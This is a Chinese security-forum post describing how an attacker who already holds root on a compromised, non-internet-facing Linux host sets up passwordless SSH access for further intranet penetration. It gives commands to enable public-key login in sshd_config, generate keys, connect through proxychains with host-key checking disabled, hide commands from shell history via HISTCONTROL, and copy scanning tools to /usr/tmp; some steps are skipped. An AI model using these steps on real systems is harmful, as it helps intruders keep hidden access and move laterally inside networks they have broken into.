安全矩阵

 找回密码
 立即注册
搜索
查看: 6136|回复: 0

无密码正向直连内网linux目标机

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-12-7 09:09:10 | 显示全部楼层 |阅读模式
原文链接;无密码正向直连内网linux目标机

    比如,前期通过一些 Rce,提权 或者其它方式,拿到内网一台linux 目标机的root权限,但用户密码hash跑不出来,机器无法正常出网,Webshell 里操作实在是麻烦, 费劲,为了能更方便的进行后续的内网渗透操作,现在就迫切需要一个真正的pts终端,怎么搞 ? 很简单,如下

    启用Ssh证书登录,并重启SSH 服务 [ 此处linux发行版为 CentOS7.x 其它发行版同理 ]
  1. # echo RSAAuthentication yes >> /etc/ssh/sshd_config
  2. # echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
  3. # systemctl restart sshd
复制代码

0x02 然后,回到本地linux上生成密钥对
  1. # ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
  2. # ls -al /root/.ssh/
  3. # cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
  4. # mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys
复制代码
0x03 接着,回到内网linux目标机上
  1. # proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28
  2. # export HISTCONTROL=ignorespace
  3. # echo $HISTCONTROL
  4. #  w
复制代码




0x05 同理,利用Scp 无密码互传文件
  1. # proxychains4 scp -P 22 -r /root/Srvscan root@172.16.7.28:/usr/tmp/Srvscan
  2. # proxychains4 scp -P 22 -r /root/fingerprint.py root@172.16.7.28:/usr/tmp/
  3. # proxychains4 scp -P 22 -r /root/GetWebBanner.py root@172.16.7.28:/usr/tmp/
复制代码



    如果觉得确实还不错,欢迎积极转发留言,以便让更多真正需要的人也能看到,如文中遇到错误,欢迎随时私信指正,非常感谢

    另外,也非常期待能和更多真正志同道合弟兄一起深入交流学习,( 还是那句话,维护不易,乱七八糟的人就不要来了,非常感谢 ),密圈已适时优惠,需要的弟兄,请尽快,定期进来偷资料的,请自行离开,谢谢


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 16:05 , Processed in 0.012607 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表